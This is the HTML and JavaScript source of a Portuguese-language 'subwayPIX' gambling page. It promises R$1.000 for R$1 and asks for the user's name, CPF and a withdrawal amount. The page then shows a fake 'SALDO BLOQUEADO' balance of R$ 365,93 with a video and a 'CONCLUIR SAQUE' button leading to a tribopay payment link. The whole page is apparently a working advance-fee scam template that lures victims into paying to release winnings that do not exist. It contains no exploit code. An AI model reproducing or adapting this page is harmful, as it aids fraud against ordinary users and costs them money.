<!DOCTYPE html>
<html lang="pt-BR" class="w-mod-js">
<head>
    <meta charset="UTF-8">
    <title>Saque</title>
    <meta name="description" content="Já imaginou ganhar R$1.000 com apenas R$1 único real? O jogo do surfista vai fazer você faturar muito.">
    <meta property="og:image" content="images/app-icon-72.png">
    <meta property="og:url" content="https://subwayPIX.net/">
    <meta property="og:title" content="Saque">
    <meta property="og:description" content="Já imaginou ganhar R$1.000 com apenas R$1 único real? O jogo do surfista vai fazer você faturar muito.">
    <meta name="twitter:site" content="@subwayPIX">
    <meta name="twitter:image" content="/game/assets/images/app-icon-72.png">
    <meta property="twitter:title" content="Saque">
    <meta property="twitter:description" content="Já imaginou ganhar R$1.000 com apenas R$1 único real? O jogo do surfista vai fazer você faturar muito.">
    <meta property="og:type" content="website">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="css/page.css" rel="stylesheet">
    <script src="js/webfont.js"></script>
    <script src="js/script.js"></script>
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-6YEH5WP2P5"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() {
            dataLayer.push(arguments);
        }
        gtag('js', new Date());
        gtag('config', 'G-6YEH5WP2P5');
    </script>
    <style>
        /* Estilo para o popup */
        #popupContainer {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 9999;
        }
        .popup-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            width: 90%;
            max-width: 600px;
            box-sizing: border-box;
        }
        .popup-button {
            display: inline-block;
            margin-top: 20px;
            padding: 10px 20px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            border-radius: 5px;
            white-space: nowrap;
        }
        .popup-button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <section id="hero" class="hero-section dark wf-section">
        <div class="minting-container w-container">
            <img src="images/q3qUe5u.png" loading="lazy" width="240" data-w-id="6449f730-ebd9-23f2-b6ad-c6fbce8937f7" alt="Roboto #6340" class="mint-card-image">
            <h2>SAQUE</h2>
            <h4>Preencha os dados abaixo corretamente para não ocorrer erros no saque:</h4>
            <form>
                <div class="properties">
                    <h4 class="rarity-heading">Nome Completo do destinatário:</h4>
                    <div class="rarity-row roboto-type2">
                        <input type="text" class="large-input-field w-node-_050dfc36-93a8-d840-d215-4fca9adfe60d-9adfe605 w-input" maxlength="256" name="nomeCompleto" placeholder="Nome do destinatário:" id="nomeCompleto" required="" data-gtm-form-interact-field-id="0">
                    </div>
                    <h4 class="rarity-heading">Chave PIX CPF:</h4>
                    <div class="rarity-row roboto-type2">
                        <input type="text" class="large-input-field w-node-pix-cpf w-input" maxlength="11" name="chavePixCpf" placeholder="Seu CPF (somente números)" oninput="formatarCpf(this)" required="" data-gtm-form-interact-field-id="1">
                    </div>
                    <h4 class="rarity-heading">Valor para saque</h4>
                    <div class="rarity-row roboto-type2">
                        <input type="number" class="large-input-field w-node-valor-saque w-input" max="400" name="valorSaque" placeholder="Digite o valor aqui" oninput="validarValor(this)" required="" data-gtm-form-interact-field-id="2">
                    </div>
                    <br>
                    <div class="">
                        <input type="button" value="SACAR AGORA" class="primary-button w-button" onclick="verificarPreenchimento()">
                    </div>
                </div>
            </form>
        </div>
    </section>

    <!-- Popup -->
    <div id="popupContainer">
        <div class="popup-content">
            <!-- Container para o conteúdo -->
            <div class="content-container">
                <!-- Nova Headline -->
                <h1>SALDO BLOQUEADO</h1>
                <!-- Headline com o valor -->
                <h2>R$ 365,93</h2><br>
                <!-- Texto menor -->
                <h2>Assista o vídeo abaixo para aprender a sacar.</h2>
                <!-- Vídeo -->
                 <div id="vid_66d77657a94a3b000bf87728" style="position:relative;width:100%;padding: 56.25% 0 0;"> <img id="thumb_66d77657a94a3b000bf87728" src="https://images.converteai.net/68d77d36-0b54-4d5e-ab95-f41649ececfd/players/66d77657a94a3b000bf87728/thumbnail.jpg" style="position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;display:block;"> <div id="backdrop_66d77657a94a3b000bf87728" style="position:absolute;top:0;width:100%;height:100%;-webkit-backdrop-filter:blur(5px);backdrop-filter:blur(5px);"></div> </div> <script type="text/javascript" id="scr_66d77657a94a3b000bf87728"> var s=document.createElement("script"); s.src="https://scripts.converteai.net/68d77d36-0b54-4d5e-ab95-f41649ececfd/players/66d77657a94a3b000bf87728/player.js", s.async=!0,document.head.appendChild(s); </script> <style> .elementor-element:has(#smartplayer) { width: 100%; } </style>

                <!-- Botão para o site -->
                <a href="https://go.tribopay.com/qhrsc" class="popup-button" target="_blank">CONCLUIR SAQUE</a>
            </div>

            <style>
                .content-container {
                    text-align: center;
                    padding: 10px;
                    box-sizing: border-box;
                }
                .content-container h1 {
                    font-size: 11px;
                    margin-bottom: 5px;
                }
                .content-container h2 {
                    font-size: 19px;
                    margin-bottom: 5px;
                }
                .content-container h3 {
                    font-size: 8px; /* Ajustei para garantir que o texto caiba no popup */
                    margin-bottom: 10px;
                    white-space: nowrap;
                }
                .video-container {
                    position: relative;
                    width: 100%;
                    padding-top: 56.25%; /* 16:9 Aspect Ratio */
                }
                .video-thumbnail {
                    position: absolute;
                    top: 0;
                    left: 0;
                    width: 100%;
                    height: 100%;
                    object-fit: cover;
                    display: block;
                }
                .video-backdrop {
                    position: absolute;
                    top: 0;
                    width: 100%;
                    height: 100%;
                    -webkit-backdrop-filter: blur(5px);
                    backdrop-filter: blur(5px);
                }
                .elementor-element:has(#smartplayer) {
                    width: 100%;
                }
                .popup-button {
                    display: inline-block;
                    padding: 10px 30px;
                    background-color: #007bff;
                    color: #fff;
                    text-decoration: none;
                    border-radius: 5px;
                    white-space: nowrap;
                }
                .popup-button:hover {
                    background-color: #0056b3;
                }
            </style>
        </div>
    </div>

    <style>
        /* Estilo para o botão flutuante */
        .whatsapp-button {
            position: fixed;
            bottom: 20px;
            right: 20px;
            border-radius: 50%;
            width: 50px;
            height: 50px;
        }
    </style>

    <script>
        // Função para abrir o popup
        function openPopup() {
            var popup = document.getElementById("popupContainer");
            popup.style.display = "block";
        }

        // Verificar se os campos foram preenchidos antes de abrir o popup
        function verificarPreenchimento() {
            var nomeCompleto = document.getElementById("nomeCompleto").value;
            var chavePixCpf = document.getElementsByName("chavePixCpf")[0].value;
            var valorSaque = document.getElementsByName("valorSaque")[0].value;

            if (nomeCompleto !== "" && chavePixCpf !== "" && valorSaque !== "") {
                openPopup();
            } else {
                alert("Por favor, preencha todos os campos para prosseguir.");
            }
        }

        function formatarCpf(input) {
            let cpf = input.value.replace(/\D/g, '');
            cpf = cpf.replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, '$1.$2.$3-$4');
            input.value = cpf;
        }

        function validarValor(input) {
            let valor = parseInt(input.value);
            if (valor > 400 || isNaN(valor)) {
                alert("O valor máximo para saque é 400.");
                input.value = "";
            }
        }
    </script>
</body>
</html>
